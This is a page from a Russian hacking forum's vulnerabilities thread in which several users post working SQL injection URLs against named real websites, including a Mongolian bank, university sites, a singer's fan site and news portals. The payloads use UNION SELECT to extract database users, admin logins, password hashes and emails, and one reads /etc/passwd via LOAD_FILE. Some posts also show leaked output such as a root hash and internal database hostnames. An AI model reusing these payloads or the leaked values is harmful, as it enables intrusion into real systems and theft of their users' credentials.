ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3061  
Старый 08.09.2007, 19:28
Аватар для kair
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

MONGOL POSTBANK
Код:
http://www.postbank.mn/eng/index.php?ac=news&newsid=650000%20union%20select%201,2,3,4,concat(user,char(58),password),6,7,8%20from%20mysql.user/*
 
Ответить с цитированием

  #3062  
Старый 08.09.2007, 20:03
Аватар для c001er*
c001er*
Познающий
Регистрация: 15.06.2007
Сообщений: 39
Провел на форуме:
262630

Репутация: 20
По умолчанию

http://www.alt.ac.uk/workshop_detail.php?e=-181+union+select+user(),2,3,4,5,6/*
 
Ответить с цитированием

  #3063  
Старый 08.09.2007, 22:21
Аватар для fobofob
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

Официальный сайт Полины Гагариной певица и просто красивая девушка

код:
http://www.gagarina.com/news.php?id=-41+union+select+1,concat(username,0x3a,user_passwo rd,0x3a,user_email,0x3a,user_icq),3,4,5,6+from+php bb_users+limit+1,1/*
свыше 200 юзеров,
не разобрался в какой кодировке пароли
md5^^

Последний раз редактировалось ice1k; 09.09.2007 в 15:28..
 
Ответить с цитированием

sql
  #3064  
Старый 09.09.2007, 10:46
Аватар для Nea7
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию sql

Код:
http://www.si.umich.edu/CHICO/instrument/fullrecord.phtml?id=9999+union+select+1,2, USER(),4,5,VERSION(),7,8,9,DATABASE(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
user chico@harvbannister.si.umich.edu
version 4.0.13
database chico


Код:
http://www.law.harvard.edu/faculty/directory/facdir.php?id=-1+ union+select+concat(user(),0x3a,version(),0x3a,database())/*
user facdir@hlssun1
version 4.0.20-log
database academics


Код:
http://www.kievsex.com/shop/?cat_id=99999+union+select+1,concat(username,0x3a,user_password,0x3a,user_ email,0x3a,user_icq),3,4,5,6,7,8,9,10+from+phpbb_ users+limit+1,1/*
мож кто расшифрует...

Код:
http://asya-club.ru/board/message.php?id=-1+union+select+1,2,version(),user(),5,6, database(),8/*
version 5.0.41-log
user arigato@localhost
database asyaclu5_chateng


_http://asya-club.ru/board/message.php?id=-1+union+select+1,2,user,4,password,6,7,8+from+mysq l. user/*

root:02462cca620de2cd

_hxxp://asya-club.ru/board/message.php?id=-1+union+select+1,2,3,4,LOAD_FILE(char(47,101,116,9 9,47,112,97,115,115,119,100)),6,7,8/*
_http://asya-club.ru/board/message.php?id=-1+union+select+1,2,3,4,pwd,6,login,8+from+administ rators/*

Последний раз редактировалось Nea7; 09.09.2007 в 11:01.. Причина: ясн
 
Ответить с цитированием

  #3065  
Старый 09.09.2007, 12:32
Аватар для Nea7
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию

InterComp - Все о компьютерах и для вашего компьютера (hardware, software)

Код:
http://intercomp.net.ru/dll/file.php?id=-1+union+select+1,2,concat(username,0x3a,user_password ,0x3a,user_email,0x3a,user_icq),4+from+phpbb_users+limit+1,1/*
вывод под фразой "Описание DLL"...
Код:
http://www.inso.edu.ru/seminars/info.phtml?id=-1+union+select+1,2,3,4,USER(),VERSION(),7,8,DATABASE( ),10,11,12,13,14,15,16,17,18,19,20/*
user mlogos@pm15.zenon.net
version 4.0.27-log
database mlogos
 
Ответить с цитированием

.ro
  #3066  
Старый 09.09.2007, 15:01
Аватар для Nea7
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию .ro

пройдемся по Румынии:

_htp://ori.utcluj.ro/burse/detalii_bursa.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18/*
подбираем столбец и таблицу:
Код:
http://ori.utcluj.ro/burse/detalii_bursa.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(column_name,0x3a,table_name),16,17,18+from+INFORMATION_SCHEMA.COLUMNS+limit+160,1/*
выводим логин:пароль админа:

_http://ori.utcluj.ro/burse/detalii_ bursa.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat(username,0x3a,password),16,17,18+from+adabsol utum_admin/*

Последний раз редактировалось Nea7; 09.09.2007 в 15:04..
 
Ответить с цитированием

  #3067  
Старый 09.09.2007, 16:09
Аватар для fobofob
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

АРТЕК
в детстве очень мечтал туда попасть...


код:


http://www.artek.org/index.phtml?ID=-101101+union+select+1,2,3,4,5,6,7,concat(uname,cha r(58),sname,char(58),nick,char(58),email,char(58), password),9,10,11,12,13,14+from+artekovtsi+limit+7 ,1/*
 
Ответить с цитированием

  #3068  
Старый 09.09.2007, 18:44
Аватар для Ded MustD!e
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Код:
https://maps.tva.com/scripts/store/cart.asp?ID=1+or+1=(SELECT+TOP+1+Username+FROM+Login)--
колонка с паролями - Password
 
Ответить с цитированием

  #3069  
Старый 10.09.2007, 00:58
Аватар для l-l00K
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217

Репутация: 2097
По умолчанию

popmech.ru
4.0.26opmechopmech@www.popmech.ru
Код:
http://www.popmech.ru/part/?articleid=2195+UNION+SELECT+concat(name,char(58),password)+from+users+--+&rubricid=4
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

  #3070  
Старый 10.09.2007, 16:36
Аватар для f1rebl00d
f1rebl00d
Познающий
Регистрация: 27.12.2006
Сообщений: 37
Провел на форуме:
1253202

Репутация: 133
По умолчанию

http://www.generationrice.com/index.phtml?talk=carlnomura_-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ